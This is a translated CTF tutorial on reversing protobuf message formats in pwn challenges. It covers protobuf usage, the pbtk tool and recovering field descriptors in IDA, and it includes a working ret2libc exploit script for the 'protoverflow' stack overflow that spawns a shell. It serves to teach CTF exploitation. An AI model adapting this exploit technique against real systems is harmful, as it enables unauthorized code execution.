Exploiting protobuf in pwn challenges - Xianzhi Community (先知社区)

protobuf

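Introduction

Protobuf (short for Protocol Buffers) is a lightweight, efficient protocol developed by Google for serializing structured data. It serializes data structures into a compact binary format for network communication or data storage. Protobuf is designed to be cross-platform and language-neutral, so it is widely used in distributed systems, network communication, remote procedure calls (RPC), and similar scenarios.

In plain words, protobuf is a data exchange format: it converts the data in a program (text, numbers, and so on) into a very compact binary encoding, so the data takes less space in transit and is faster to send.

For example, your program may have some data that it wants to pass to another program (a server or a client, say). With a text format such as JSON or XML, the data gets larger and slower to transmit. Protobuf encodes the same data in a much smaller form, a bit like packing a long letter into a small parcel, which makes transmission more efficient.

The encoded data is binary, though, so humans cannot read it directly; a program has to "unpack" it in the matching way to recover the original data.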
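To make the size difference concrete, here is a small Python sketch that hand-encodes one record the way the protobuf wire format does and compares it with the JSON form. The record, its field numbers (1, 2, 3), and the helper functions are made up for this illustration; they are not part of any protobuf library.

```python
import json


def encode_varint(value: int) -> bytes:
    """Encode a non-negative integer as a base-128 varint."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)  # high bit set: more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def encode_field(number: int, value) -> bytes:
    """Encode one field: int as varint (wire type 0), str as length-delimited (wire type 2)."""
    if isinstance(value, int):
        return encode_varint((number << 3) | 0) + encode_varint(value)
    data = value.encode("utf-8")
    return encode_varint((number << 3) | 2) + encode_varint(len(data)) + data


# Hypothetical record used only for the comparison
record = {"id": 123, "name": "John Doe", "email": "john.doe@example.com"}

as_json = json.dumps(record).encode("utf-8")
as_protobuf = (encode_field(1, record["id"])
               + encode_field(2, record["name"])
               + encode_field(3, record["email"]))

print("JSON bytes:    ", len(as_json))
print("protobuf bytes:", len(as_protobuf))
print(as_protobuf.hex())
```

The saving comes from dropping the field names and punctuation: each field is introduced by a small numeric key instead of a quoted name.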

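So how does this affect us when solving challenges? The key point is that protobuf supports many languages and can carry data between different language environments: you can serialize data in a Python program and deserialize it in a C++ program. Each side only needs to generate the code for its own language and serialize or deserialize according to the shared definition.

In pwn, therefore, the difficulty of this kind of challenge lies in the reversing. Compared with a regular pwn challenge there is an extra layer of protobuf unpacking, and the hard part is working out how to interact with the binary at all.

Using protobuf

Since we have to reverse it, we first need to know how the conversion works. To begin with, on Linux we can install protobuf with the package manager: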

sudo apt-get update
sudo apt-get install -y protobuf-compiler libprotobuf-dev

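Depending on the programming language you use, install the matching protobuf library so that your program can serialize and deserialize data. We will generally need Python and C.

Use

sudo apt-get install libprotobuf-c-dev protobuf-c-compiler

to install the C support, and run protoc-c --version to check that the installation succeeded.

Now for the actual writing. Here we can create a user.proto file: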

syntax = "proto3";

message User {
  int32 id = 1;
  string name = 2;
  string email = 3;
}

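Then generate the C code with the following command:

protoc-c --c_out=. user.proto

This generates two files in the current directory: user.pb-c.h and user.pb-c.c.

user.pb-c.h: the header file, which defines the message type (such as the User struct) and declares its related functions.

user.pb-c.c: the source file, which implements those functions, including serialization and deserialization.

In your C program you need to include the generated user.pb-c.h header so that you can use the User message type and its protobuf functions.

For example: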

#include <stdio.h>
#include <stdlib.h>
#include "user.pb-c.h"  // include the generated header

int main() {
    // Create a User object and initialize it
    User user = USER__INIT;  // generated macro that initializes the User struct
    user.id = 123;  // set the user ID
    user.name = "John Doe";  // set the user name
    user.email = "john.doe@example.com";  // set the user email

    // Serialize the message
    size_t serialized_size = user__get_packed_size(&user);  // size needed for the serialized message
    void *buffer = malloc(serialized_size);  // allocate memory for the serialized data
    if (buffer == NULL) {
        fprintf(stderr, "Out of memory\n");
        return 1;
    }
    user__pack(&user, buffer);  // serialize into buffer

    printf("Serialized User data to %zu bytes\n", serialized_size);

    // Deserialize the message
    User *new_user = user__unpack(NULL, serialized_size, buffer);  // rebuild a User object from the binary data
    if (new_user == NULL) {
        fprintf(stderr, "Error unpacking User message\n");
        free(buffer);
        return 1;
    }

    // Print the unpacked User data
    printf("ID: %d\n", new_user->id);
    printf("Name: %s\n", new_user->name);
    printf("Email: %s\n", new_user->email);

    // Clean up
    user__free_unpacked(new_user, NULL);  // free the deserialized object
    free(buffer);  // free the serialization buffer

    return 0;
}

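Then we compile it:

gcc -o my_program user.pb-c.c your_program.c -lprotobuf-c

In this command:

user.pb-c.c is the C source file generated by protoc-c.
your_program.c is the C file you wrote that contains the main program.
-lprotobuf-c links against the protobuf-c library.

On my machine the file is called pwn.c, so my command is:

gcc -o pwn user.pb-c.c pwn.c -lprotobuf-c

After that we can see that a pwn executable has been generated.

That completes the basic usage. This code has no interaction at all, so it can simply be run directly.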

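Example: protoverflow

Using tools

Now that we know how to use protobuf, we can start learning how to reverse this kind of challenge.

Most pwn challenges require interaction, so we have to reverse the message structure and talk to the binary in the format it expects.

Usually we use a tool for this (doing it by hand also works).

Before that, we need to install some Python dependencies: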

pip install google
pip install protobuf

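Two challenges serve as examples here. The first is protoverflow from the CISCN Central China regional semifinal (heaven knows why CISCN likes protobuf so much).

We open it in IDA.

The program hands us a libc address and then tries to parse a protobuf message. If parsing succeeds, it enters the real main function, the sub_324A shown above. Let's try running it.

It fails with an error saying that a shared library cannot be found. ldd shows that libprotobuf.so.10 is missing, but the attachment actually ships it, so we only need to fix the path.

Use the following command:

ln -s /home/protobuf/protoverflow/libprotobuf.so.10 /usr/lib/libprotobuf.so.10

because my copy of the attachment lives in /home/protobuf/protoverflow.

Now it runs normally, but typing ordinary data into it produces an error, namely a protobuf parse error. This is exactly what this kind of challenge tests: the binary does not accept arbitrary input, and you must interact with it in a specific format, much like JSON-based pwn challenges.

Let's look at this line: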

v5 = google::protobuf::MessageLite::ParseFromArray((google::protobuf::MessageLite *)&unk_209080, s, v6);

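The google::protobuf::MessageLite::ParseFromArray function called here parses data from a given byte array and fills the corresponding protobuf message object with it.

google::protobuf::MessageLite is an abstract base class that defines the basic interface and operations of all protobuf messages. ParseFromArray is a member function of this class. It normally takes two parameters, data and size, and parses a protobuf message from a byte array that starts at data and is size bytes long.

Here the decompiler shows three arguments because the first one is the implicit this pointer: the call reads v6 bytes from the byte array s and stores the parsed message in unk_209080. ParseFromArray returns true if parsing succeeds.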
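To get a feel for why ordinary input is rejected, the sketch below walks a buffer roughly the way any protobuf parser has to: read a key, split it into field number and wire type, then read the value. It is a simplified illustration written for this article, not libprotobuf's actual implementation, which additionally checks the fields against the message schema (including required fields).

```python
def read_varint(buf: bytes, pos: int):
    """Return (value, new_pos); raise ValueError on truncated or oversized varints."""
    result = shift = 0
    while True:
        if pos >= len(buf) or shift > 63:
            raise ValueError("bad varint")
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def parse_fields(buf: bytes):
    """Split a serialized message into (field_number, wire_type, value) tuples."""
    fields, pos = [], 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        number, wire_type = key >> 3, key & 7
        if number == 0:
            raise ValueError("field number 0 is invalid")
        if wire_type == 0:            # varint
            value, pos = read_varint(buf, pos)
        elif wire_type == 1:          # fixed 64-bit
            value, pos = buf[pos:pos + 8], pos + 8
        elif wire_type == 2:          # length-delimited (string, bytes, sub-message)
            length, pos = read_varint(buf, pos)
            value, pos = buf[pos:pos + length], pos + length
        elif wire_type == 5:          # fixed 32-bit
            value, pos = buf[pos:pos + 4], pos + 4
        else:
            raise ValueError("unsupported wire type %d" % wire_type)
        if pos > len(buf):
            raise ValueError("truncated field")
        fields.append((number, wire_type, value))
    return fields


print(parse_fields(b"\x08\x7b\x12\x03abc"))   # a well-formed two-field message
try:
    parse_fields(b"hello\n")                  # plain text typed at the prompt
except ValueError as exc:
    print("rejected:", exc)
```

Plain text fails quickly because its bytes are interpreted as keys and lengths; here the third byte of "hello" decodes to a wire type this sketch does not accept.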

Here is a tool I'd like to introduce:

sudo apt install python3-pip git openjdk-11-jre libqt5x11extras5 python3-pyqt5.qtwebengine python3-pyqt5
sudo pip3 install protobuf pyqt5 pyqtwebengine requests websocket-client
git clone https://github.com/marin-m/pbtk
cd pbtk
./gui.py

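We choose the first option and then select the pwn binary we want to analyze.

The tool generates the corresponding .proto file in this directory; copy it into the folder that holds our exp.

As you can see, this is the file the tool generated for us. You have probably noticed that the fields carry two different modifiers, optional and required: optional means the field may be omitted, while required means it must be set.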

protoc --python_out=. message.proto

This command compiles it into a module that Python can import.

Once we have the generated file, we import it in the exp:

from pwn import *
import message_pb2

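Going back to the fields: the optional ones can be filled with whatever we like by assigning to the corresponding members directly, while the required ones are what we need to pay attention to.

Back in IDA, let's look at the code that runs after parsing succeeds.

n[0] is the size of the buf we supply and n[1] is its content. Since the size can be set as large as 0x1000, there is clearly a stack overflow.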

from pwn import *
import message_pb2
io=process('./pwn')
libc=ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
io.recvuntil('Gift: ')
puts_addr=int(io.recv(14)[-12:].decode(),16)
success('puts_addr: '+hex(puts_addr))

libc_base=puts_addr-libc.sym['puts']
success('libc_base: '+hex(libc_base))
system=libc_base+libc.sym['system']
pop_rdi=libc_base+0x2a255
binsh=libc_base+0x19ce43
ret=libc_base+0x2868c
payload=b'a'*0x218+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
message=message_pb2.protoMessage()
message.name=b'gets'
message.phoneNumber=b'260'
message.buffer=payload
message.size=len(payload)

payload=message.SerializeToString()
io.send(payload)
io.interactive()

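Let's see why the exp is written this way. Our input has to follow the message format, so the message assignments in the middle are fixed boilerplate. The two optional fields just need values of the right data type. The two required fields we have to fill in ourselves: buffer holds the payload, and the size line sets size to the payload length. Of course, the payload shown so far is not the final correct one; it only serves as an illustration.

As you can see, the data we send matches the format. What remains is a simple ret2libc that abuses the unchecked memcpy in the binary.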
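If the generated message_pb2 module is not at hand, the same packet can be built by hand, since the message only contains length-delimited fields and one varint. The sketch below assumes the field numbers are 1 to 4 in the order name, phoneNumber, buffer, size; the .proto produced by the tool is not reproduced in this article, so treat that numbering as an assumption and check it against your own file. The helper names are invented for this example.

```python
def varint(value: int) -> bytes:
    """Encode a non-negative integer as a protobuf varint."""
    out = bytearray()
    while value > 0x7F:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def len_field(number: int, data: bytes) -> bytes:
    """Length-delimited field (wire type 2): used for string and bytes."""
    return varint((number << 3) | 2) + varint(len(data)) + data


def uint_field(number: int, value: int) -> bytes:
    """Varint field (wire type 0): used for uint32."""
    return varint((number << 3) | 0) + varint(value)


def build_message(name: bytes, phone: bytes, buffer: bytes, size: int) -> bytes:
    # Assumed numbering: name=1, phoneNumber=2, buffer=3, size=4
    return (len_field(1, name) + len_field(2, phone)
            + len_field(3, buffer) + uint_field(4, size))


# Placeholder payload: padding only, no real ROP chain
payload = b"a" * 0x218 + b"B" * 8
packet = build_message(b"gets", b"260", payload, len(payload))
print(len(packet), packet[:16].hex())
```

With pwntools the result would be sent exactly like the serialized message in the exp, for example with io.send(packet).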

Manual reversing

So where do we start if we reverse it by hand?

Let's first go back to what an original .proto file looks like:

// demo.proto
syntax = "proto3";

package tutorial;

message Person {
  string name = 1;
  int32 id = 2;
  string email = 3;

  enum PhoneType {
    PHONE_TYPE_UNSPECIFIED = 0;
    PHONE_TYPE_MOBILE = 1;
    PHONE_TYPE_HOME = 2;
    PHONE_TYPE_WORK = 3;
  }

  message PhoneNumber {
    string number = 1;
    PhoneType type = 2;
  }

  repeated PhoneNumber phones = 4;
}

message AddressBook {
  repeated Person people = 1;
}

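Each field consists of a modifier (required/repeated/optional; required exists only in proto2), a field type (bool/string/bytes/int32, etc.), and a field tag (the field number).

For a required field, a value must be provided; otherwise the message counts as uninitialized.
For an optional field, if no value is set, the field takes a default value. In the definition above, for instance, an unset PhoneType field takes the enum's zero value, PHONE_TYPE_UNSPECIFIED; proto2 also lets you specify an explicit default.
A repeated field can occur any number of times.
The field tag identifies the field in the binary stream. It is mandatory, and the same field must use the same tag value on the serializing and deserializing sides; otherwise deserialization goes wrong in unexpected ways.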
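The tag is what actually ends up on the wire: every encoded field starts with a key computed as (field_number << 3) | wire_type. As a quick sketch, here are the key bytes for the Person fields from the definition above; the small wire-type table only covers the kinds used in that message.

```python
# Wire types for the field kinds used in Person (0 = varint, 2 = length-delimited)
WIRE_TYPES = {"int32": 0, "string": 2, "message": 2}


def field_key(number: int, wire_type: int) -> int:
    """Key that introduces a field on the wire (one byte for field numbers below 16)."""
    return (number << 3) | wire_type


person_fields = [
    ("name", 1, "string"),
    ("id", 2, "int32"),
    ("email", 3, "string"),
    ("phones", 4, "message"),
]

for name, number, kind in person_fields:
    key = field_key(number, WIRE_TYPES[kind])
    print(f"{name:7s} tag {number} -> key byte 0x{key:02x}")
```

This is why both sides must agree on the tag: if the sender writes field 3 and the receiver expects that value under field 2, the key bytes no longer match and the value lands in the wrong member or is skipped.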

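In other words, the binary we are reversing must contain a similar structure, so the idea is to use strings as the entry point. Press Shift+F12 to open the strings window and search for message.

These strings are easy to find, and clicking protoMessage takes us to the corresponding location. This works because parsing relies on a descriptor that describes the message layout (in protobuf-c, for example, the unpack function receives it as an argument). We can analyze the descriptor in IDA to recover the message structure.

After selecting the printable characters, press A to turn them into a string. This is in fact our structure.

Let's reverse it briefly: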

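#include <stddef.h>

typedef struct {
    const char* name;         // field name
    int number;              // field number
    int label;               // label
    int type;                // type
    size_t quantifier_offset; // quantifier offset
    size_t offset;           // member offset
    void* flags;             // flags
    void* reserved[3];       // reserved members
} ProtobufFieldDescriptor;

// Assumed layout of the message struct, added only so that offsetof() compiles;
// the real layout comes from the generated header.
typedef struct {
    char* name;
    char* phoneNumber;
    struct { size_t len; unsigned char* data; } buffer;
    unsigned int size;
} protoMessage;

// Illustrative constants for this sketch; the real protobuf-c enum values differ
#define PROTOBUF_C_LABEL_OPTIONAL 1
#define PROTOBUF_C_LABEL_REQUIRED 2
#define PROTOBUF_C_TYPE_STRING 1
#define PROTOBUF_C_TYPE_BYTES 2
#define PROTOBUF_C_TYPE_UINT32 3

// Descriptor definitions
static const ProtobufFieldDescriptor protoMessage__field_descriptors[] = {
    {
        "name",                  // field name
        1,                       // field number
        PROTOBUF_C_LABEL_OPTIONAL, // label
        PROTOBUF_C_TYPE_STRING,   // type
        0,                       // quantifier offset
        offsetof(protoMessage, name), // member offset
        NULL,                    // flags
        {0, NULL, NULL}         // reserved members
    },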
    {
        "phoneNumber",
        2,
        PROTOBUF_C_LABEL_OPTIONAL,
        PROTOBUF_C_TYPE_STRING,
        0,
        offsetof(protoMessage, phoneNumber),
        NULL,
        {0, NULL, NULL}
    },
    {
        "buffer",
        3,
        PROTOBUF_C_LABEL_REQUIRED,
        PROTOBUF_C_TYPE_BYTES,
        0,
        offsetof(protoMessage, buffer),
        NULL,
        {0, NULL, NULL}
    },
    {
        "size",
        4,
        PROTOBUF_C_LABEL_REQUIRED,
        PROTOBUF_C_TYPE_UINT32,
        0,
        offsetof(protoMessage, size),
        NULL,
        {0, NULL, NULL}
    }
};

That is the result after reversing, but we need to know a few definitions beforehand.

The ProtobufCFieldDescriptor struct

struct ProtobufCFieldDescriptor {
    /** Name of the field as given in the .proto file. */
    const char      *name;

    /** Tag value of the field as given in the .proto file. */
    uint32_t        id;

    /** Whether the field is `REQUIRED`, `OPTIONAL`, or `REPEATED`. */
    ProtobufCLabel      label;

    /** The type of the field. */
    ProtobufCType       type;

    /**
     * The offset in bytes of the message's C structure's quantifier field
     * (the `has_MEMBER` field for optional members or the `n_MEMBER` field
     * for repeated members or the case enum for oneofs).
     */
    unsigned        quantifier_offset;

    /**
     * The offset in bytes into the message's C structure for the member
     * itself.
     */
    unsigned        offset;

    /**
     * A type-specific descriptor.
     *
     * If `type` is `PROTOBUF_C_TYPE_ENUM`, then `descriptor` points to the
     * corresponding `ProtobufCEnumDescriptor`.
     *
     * If `type` is `PROTOBUF_C_TYPE_MESSAGE`, then `descriptor` points to
     * the corresponding `ProtobufCMessageDescriptor`.
     *
     * Otherwise this field is NULL.
     */
    const void      *descriptor; /* for MESSAGE and ENUM types */

    /** The default value for this field, if defined. May be NULL. */
    const void      *default_value;

    /**
     * A flag word. Zero or more of the bits defined in the
     * `ProtobufCFieldFlag` enum may be set.
     */
    uint32_t        flags;

    /** Reserved for future use. */
    unsigned        reserved_flags;
    /** Reserved for future use. */
    void            *reserved2;
    /** Reserved for future use. */
    void            *reserved3;
};
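When a binary is built with protobuf-c, an array of these structs sits in its data section, and each entry can be decoded with Python's struct module. The sketch below assumes a 64-bit little-endian target with 4-byte enums and natural alignment (typical for x86-64 GCC builds), which gives 72 bytes per entry; the sample bytes are fabricated for the demonstration, not taken from a real binary.

```python
import struct

# name*, id, label, type, quantifier_offset, offset, 4 bytes padding,
# descriptor*, default_value*, flags, reserved_flags, reserved2*, reserved3*
FIELD_DESC = struct.Struct("<QIIIII4xQQIIQQ")


def parse_field_descriptor(raw: bytes) -> dict:
    """Decode one ProtobufCFieldDescriptor entry (layout assumed as described above)."""
    (name_ptr, field_id, label, type_, quantifier_offset, offset,
     descriptor_ptr, default_ptr, flags,
     _reserved_flags, _reserved2, _reserved3) = FIELD_DESC.unpack(raw[:FIELD_DESC.size])
    return {
        "name_ptr": name_ptr,          # address of the field-name string
        "id": field_id,                # tag from the .proto file
        "label": label,                # ProtobufCLabel value
        "type": type_,                 # ProtobufCType value
        "quantifier_offset": quantifier_offset,
        "offset": offset,
        "descriptor_ptr": descriptor_ptr,
        "default_ptr": default_ptr,
        "flags": flags,
    }


# Fabricated entry: name string at 0x2008, tag 3, label 0, type 15, member offset 0x28
sample = FIELD_DESC.pack(0x2008, 3, 0, 15, 0, 0x28, 0, 0, 0, 0, 0, 0)
print(FIELD_DESC.size, parse_field_descriptor(sample))
```

In practice the raw bytes would come from the binary itself, for instance by reading FIELD_DESC.size bytes at the array's address, and the name pointer would then be followed to recover the field name.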

label and type

label and type are both enum types. Here are their definitions:

typedef enum {
    /** A well-formed message must have exactly one of this field. */
    PROTOBUF_C_LABEL_REQUIRED,

    /**
     * A well-formed message can have zero or one of this field (but not
     * more than one).
     */
    PROTOBUF_C_LABEL_OPTIONAL,

    /**
     * This field can be repeated any number of times (including zero) in a
     * well-formed message. The order of the repeated values will be
     * preserved.
     */
    PROTOBUF_C_LABEL_REPEATED,

    /**
     * This field has no label. This is valid only in proto3 and is
     * equivalent to OPTIONAL but no "has" quantifier will be consulted.
     */
    PROTOBUF_C_LABEL_NONE,
} ProtobufCLabel;

typedef enum {
    PROTOBUF_C_TYPE_INT32,      /**< int32 */
    PROTOBUF_C_TYPE_SINT32,     /**< signed int32 */
    PROTOBUF_C_TYPE_SFIXED32,   /**< signed int32 (4 bytes) */
    PROTOBUF_C_TYPE_INT64,      /**< int64 */
    PROTOBUF_C_TYPE_SINT64,     /**< signed int64 */
    PROTOBUF_C_TYPE_SFIXED64,   /**< signed int64 (8 bytes) */
    PROTOBUF_C_TYPE_UINT32,     /**< unsigned int32 */
    PROTOBUF_C_TYPE_FIXED32,    /**< unsigned int32 (4 bytes) */
    PROTOBUF_C_TYPE_UINT64,     /**< unsigned int64 */
    PROTOBUF_C_TYPE_FIXED64,    /**< unsigned int64 (8 bytes) */
    PROTOBUF_C_TYPE_FLOAT,      /**< float */
    PROTOBUF_C_TYPE_DOUBLE,     /**< double */
    PROTOBUF_C_TYPE_BOOL,       /**< boolean */
    PROTOBUF_C_TYPE_ENUM,       /**< enumerated type */
    PROTOBUF_C_TYPE_STRING,     /**< UTF-8 or ASCII string */
    PROTOBUF_C_TYPE_BYTES,      /**< arbitrary byte sequence */
    PROTOBUF_C_TYPE_MESSAGE,    /**< nested message */
} ProtobufCType;
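Since C enums count up from 0 in declaration order, the two listings above translate directly into lookup tables. A small Python sketch of that mapping, useful when turning the raw label and type numbers of a protobuf-c descriptor back into .proto syntax (the describe helper is invented for this example):

```python
from enum import IntEnum


class ProtobufCLabel(IntEnum):
    REQUIRED = 0
    OPTIONAL = 1
    REPEATED = 2
    NONE = 3


# Same order as the ProtobufCType enum, numbered from 0
ProtobufCType = IntEnum(
    "ProtobufCType",
    ["INT32", "SINT32", "SFIXED32", "INT64", "SINT64", "SFIXED64",
     "UINT32", "FIXED32", "UINT64", "FIXED64", "FLOAT", "DOUBLE",
     "BOOL", "ENUM", "STRING", "BYTES", "MESSAGE"],
    start=0,
)


def describe(label: int, type_: int) -> str:
    """Render raw descriptor numbers as '<label> <type>' in .proto spelling."""
    return f"{ProtobufCLabel(label).name.lower()} {ProtobufCType(type_).name.lower()}"


print(describe(1, 14))
print(describe(0, 15))
print(describe(0, 6))
```

For ENUM and MESSAGE fields the actual type name is not in these tables; it has to be read from the descriptor that the field's descriptor pointer refers to.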

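Looking at the screenshot at the top, in the disassembly the field names (for example name, phoneNumber, buffer) are defined with db directives, each followed by the field's other attributes.

The field number usually comes right after the name and is the number assigned to the field in the .proto file. For example, 1 means that name is field number 1.

The label and type can be found in the same place, each as a key byte followed by a value byte: in the dump below, 18h, 20h and 28h are the key bytes that introduce the field number, the label (optional or required) and the type.

offsetof computes the position of a member inside the struct; this information is needed when the descriptor is generated.

In a protobuf field descriptor, the flags member can hold additional information about the field, such as whether it is packed or deprecated. When no flag applies it is simply zero, which is why it appears as NULL in the reconstruction above.

Finally there are the reserved members. They are placeholders kept for future versions of the library, so that new information can be added to the descriptor later without changing the struct layout that existing code relies on.

Take name as an example: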

.rodata:0000000000006502 aName           db 4,'name'//length and field name
.rodata:0000000000006507                 db  18h
.rodata:0000000000006508                 db    1//field number
.rodata:0000000000006509                 db  20h
.rodata:000000000000650A                 db    1//label (1 means optional)
.rodata:000000000000650B                 db  28h ; (
.rodata:000000000000650C                 db    9//type (9 is TYPE_STRING)
.rodata:000000000000650D                 db  12h
.rodata:000000000000650E                 db  13h
.rodata:000000000000650F                 db  0Ah

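The label values map as follows. Note that these bytes are a serialized FieldDescriptorProto, so the numbering comes from descriptor.proto rather than from the ProtobufCLabel enum listed above:

1: optional (the field may or may not be present)

2: required (the field is mandatory and must be set)

3: repeated (the field can appear multiple times, representing an array or list)

The type value puzzled me at first: 9 is not the string entry in the ProtobufCType enum, yet the field really is a string (ChatGPT said the same), and I wondered whether it was a version difference. The explanation is the same as for the label: descriptor.proto numbers its types differently, and there TYPE_STRING is 9 (TYPE_BYTES is 12 and TYPE_UINT32 is 13). This also fits the reconstruction above, where name is an optional string.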
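One way to check this reading is to decode the dump as a serialized FieldDescriptorProto, whose fields are name (1), number (3), label (4) and type (5) in descriptor.proto. The sketch below does that with a few lines of Python. The leading 0x0A key byte is an assumption: it sits just before the address where the dump starts and is not shown there. The label and type tables follow descriptor.proto.

```python
LABELS = {1: "optional", 2: "required", 3: "repeated"}
TYPES = {1: "double", 2: "float", 3: "int64", 4: "uint64", 5: "int32",
         6: "fixed64", 7: "fixed32", 8: "bool", 9: "string", 10: "group",
         11: "message", 12: "bytes", 13: "uint32", 14: "enum",
         15: "sfixed32", 16: "sfixed64", 17: "sint32", 18: "sint64"}


def read_varint(buf: bytes, pos: int):
    result = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def decode_field_descriptor(blob: bytes) -> dict:
    """Decode the name/number/label/type fields of one FieldDescriptorProto."""
    raw, pos = {}, 0
    while pos < len(blob):
        key, pos = read_varint(blob, pos)
        number, wire_type = key >> 3, key & 7
        if wire_type == 0:                       # varint
            value, pos = read_varint(blob, pos)
        elif wire_type == 2:                     # length-delimited
            length, pos = read_varint(blob, pos)
            value, pos = blob[pos:pos + length], pos + length
        else:
            raise ValueError("unexpected wire type %d" % wire_type)
        raw[number] = value
    return {"name": raw[1].decode(), "number": raw[3],
            "label": LABELS[raw[4]], "type": TYPES[raw[5]]}


# 0x0A (assumed, not in the dump), then the bytes from 0x6502 to 0x650C
dump = b"\x0a" + bytes([4]) + b"name" + bytes([0x18, 1, 0x20, 1, 0x28, 9])
print(decode_field_descriptor(dump))
```

The three bytes that follow in the dump (12h, 13h, 0Ah) fit the same picture: 12h 13h would open the next 19-byte field entry and 0Ah its name field, which matches the length of an entry for phoneNumber.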

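Finally, we need to know how to tell whether the program uses proto2 or proto3.

proto3 removed user-defined default values for fields, so in a proto3 message the default_value member of ProtobufCFieldDescriptor carries no default (it is NULL).

The labels are another clue:

Proto2: supports the required and optional modifiers.

Proto3: every field is optional by default, and required is not supported.

So a descriptor that contains required fields or non-NULL default values points to proto2. Counting the struct members is less reliable, since protobuf-c uses the same struct layout for both versions.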
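For binaries linked against the C++ library, which is the case for protoverflow since it calls ParseFromArray, there is one more hint: the serialized file descriptor embedded in the binary has a syntax string (field 12 of FileDescriptorProto), and for proto3 files it contains "proto3". The sketch below is only a heuristic that scans a blob for that encoded field; the function name and the sample blobs are invented for illustration.

```python
def guess_syntax(blob: bytes) -> str:
    """Heuristically guess the .proto syntax from an embedded serialized file descriptor."""
    # syntax is field 12, length-delimited: key byte (12 << 3) | 2 == 0x62, then the length
    marker = bytes([(12 << 3) | 2, len(b"proto3")]) + b"proto3"
    if marker in blob:
        return "proto3"
    return "proto2 or unspecified"


# Fabricated blobs: the first ends with an encoded syntax field, the second has none
with_syntax = b"\x0a\x0dmessage.proto" + b"b\x06proto3"
without_syntax = b"\x0a\x0dmessage.proto"

print(guess_syntax(with_syntax))
print(guess_syntax(without_syntax))
```

In a real binary the blob would be the .rodata region around the embedded .proto file name; a missing marker is consistent with proto2 but does not prove it.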
The remaining fields can be handled the same way, and in the end we can recover:

syntax = "proto2";
message protoMessage {
    optional string name = 1;
    optional string phoneNumber = 2;
    required bytes buffer = 3;
    required uint32 size = 4;
}

Then run protoc --python_out=. proto_message.proto, which generates proto_message_pb2.py, and we are done.